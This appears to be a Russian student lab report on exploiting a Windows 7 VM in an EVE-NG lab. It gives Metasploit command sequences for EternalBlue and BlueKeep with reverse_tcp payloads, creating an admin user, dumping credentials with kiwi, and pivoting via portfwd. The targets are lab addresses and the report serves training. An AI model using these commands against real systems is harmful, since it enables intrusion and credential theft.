Практика №3. Эксплутация уязвимостей. MetaSplot Framework
===
# Задание к практической работе №3
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
- Используя payload meterpreter:
- выполнить создание нового пользователя
- Выполнить скриншот рабочего стола
- получить все учетные записи, находящиеся в памяти системы
- Выполнить проксирование трафика во внутреннюю инфраструктуру
### **`Выполнение задания`**
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)

- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
Включим pfsense и switch:

**Debian**
Выведим информацию о сетевых интерфейсах и их свойствах на **дебиан** командой
`ip a`

Запросим IP-адрес от DHCP-сервера командой `dhclient ens3` после чего убедимся в получении адреса снова выполнив команду `ip a`:

**Kali**
Проведем аналогичную операцию с Kali:

**Win-10**
Проверим полученный IP-адрес командой `ipconfig`:

**Win-7**
Проведем аналогичную операцию с Win-7:

- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
Разрешим проброс портов, перейдя в интерфейс pfsence через 192.168.1.1

Разрешим подключения от компьютеров:

Просканируем порты, команда `nmap 192.168.198.0/24 -O` (параметр -O в данном случае используется для определения операционной системы устройств в сети, чтобы точно убедиться, что мы обращаемся к нужной машине):

(или же можно было `nmap 192.168.198.1`):

(или `sudo nmap 192.168.198.1 -p445,3389 -A`)
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
Откроем pfsense

Просканируем внешний IP с помощью `nmap`:

- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
Воспользуемся эксплоитом `EternalBlue`
`sudo msfconsole`
`search ms17-010`
`use 0` (номер eternal_blue)
`show options`
`show targets`
(`set target [id]`) (в моем случае 2)
(`set ForceExploit true`)
`set rhost 192.168.198.135` (ip pfsense)
`run`

- Используя payload meterpreter:
- выполнить создание нового пользователя
`sudo msfconsole`
`search bluekeep`
`use 1 (bluekeep_rce)`
`set payload windows/x64/shell/reverse_tcp`
`run`
`chcp 65001` - смена кодировки

Создание нового пользователя "test" с паролем "eve@123" в качестве админа:

Проверка, что админ под логином "test" создался:

- Выполнить скриншот рабочего стола
Воспользуемся эксплоитом `BlueKeep`
`sudo msfconsole`
`search bluekeep`
`use 1 (bluekeep_rce)`
`show options`
(`set target [id]`) (в моем случае 2)
(`set ForceExploit true`)
`set rhost 192.168.198.135` (ip pfsense)
`run`
Удалось захватить экран

Собственно, можно сохранить скриншот, например, текущий находится по этому пути:

- получить все учетные записи, находящиеся в памяти системы
`sudo msfconsole`
`search bluekeep`
`use 1 (bluekeep_rce)`
`set payload windows/x64/meterpreter/reverse_tcp`
(`set target [id]`) (в моем случае 2)
(`set ForceExploit true`)
`set rhost 192.168.198.135` (ip pfsense)
`run`
`load kiwi`
`creds_all`



иной способ: меньше инфы:
`sudo msfconsole`
`search bluekeep`
`use 1 (bluekeep_rce)`
`set payload windows/x64/shell/reverse_tcp`
(`set target [id]`) (в моем случае 2)
(`set ForceExploit true`)
`set rhost 192.168.198.135` (ip pfsense)
`run`
`chcp 65001` - смена кодировки
`query user`

- Выполнить проксирование трафика во внутреннюю инфраструктуру
`sudo msfconsole`
`search bluekeep`
`use 1 (bluekeep_rce)`
`set payload windows/x64/meterpreter/reverse_tcp`
(`set target [id]`) (в моем случае 2)
(`set ForceExploit true`)
`set rhost 192.168.198.135` (ip pfsense)
`run`
Ввводим:
`portfwd add -L 192.168.198.133 (<-- kali ip) -l 2323 (<-- random port)`
`-p 443 -r 192.168.1.1 (<-- local pfsense ip)`:

Переходим по адресу `https://192.168.198.133:2323`:
